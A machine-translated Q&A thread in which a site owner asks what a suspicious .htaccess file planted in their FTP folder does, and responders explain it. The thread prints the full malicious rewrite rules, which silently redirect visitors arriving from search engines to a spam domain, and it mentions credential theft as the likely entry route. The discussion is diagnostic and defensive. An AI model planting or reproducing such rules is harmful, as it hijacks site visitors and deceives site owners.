Підозрілий файл .htaccess

20

Це було завантажено в одну з моїх папок FTP. Я не знайомий з Apache, але все ще цікаво - чи може хтось мені сказати, який тип зухвалих дій цей файл намагається здійснити? Спасибі!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2  security  mod-rewrite  .htaccess 
овінофіл
джерело
1
НІШЕ! (По-злому ...) В основному приймає всіх, хто заходить на ваш сайт із пошукової системи, і перенаправляє їх на SPAMMER.info
KPWINC
Це колись трапилося зі мною У .htaccessфайлі, який було додано на мій сайт, було близько 40 порожніх рядків у верхній частині, просто для того, щоб переплутати мене далі.
TRiG

Відповіді:

15

Це надсилає користувачів, які надходять із пошукової системи на останній сайт SPAMMER.info(див. Історію питань щодо фактичного сайту).

Він шукає рефератів у спробі сховатися від вас , оскільки ви, ймовірно, не маєте доступу до сайту через пошукові системи. Тобто, якщо ви переходите до URL безпосередньо, все здається нормальним. Однак якщо ви заходите через пошукову систему, ви переспрямовуєтесь.

Примітка. Це не впливає на веб-сканери, оскільки вони ( принаймні, googlebot ) не встановлюють заголовок реферала.

Майкл Харен
джерело
8

Щоразу, коли користувач із пошукової системи на будь-якій сторінці на вашому веб-сайті переспрямується на сайт .info спам.

Це дуже проникливо - ви не помітите нічого поганого, оскільки зазвичай просто введете адресу.

Грег
джерело
1
Оскільки він дивиться на реферала, чи не буде він перенаправляти будь-які кліки, що надходять через пошукову систему?
Це також не впливає на посилання від Google? Наприклад, ви шукаєте сайт ОП в Google, натискаєте на нього, і ви переспрямовуєтесь з моменту приходу з Google?
Так, посилання лише з пошукових систем (як я вже говорив у своїй відповіді), але не сканери / боти пошукових систем. Цю відповідь було оновлено, тому вона є правильною. Спочатку вказувалося, що це стосується лише ботів.
Майкл Харен
1

щоб додати більше - швидше за все, ваші ftp облікові дані витекли. можливо, ви зберегли їх у filezilla / total command тощо. Є багато зловмисного програмного забезпечення, яке викрадає, а потім "переходить" - увійти до облікових записів ftp, приєднати шкідливий javascript до index.php / html або поставити подібні файли перезапису.

pQd
джерело
Я стикаюся з цим питанням. День за іншим .htaccess файл змінюється, що призводить до внутрішньої помилки сервера.
vnix27
Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.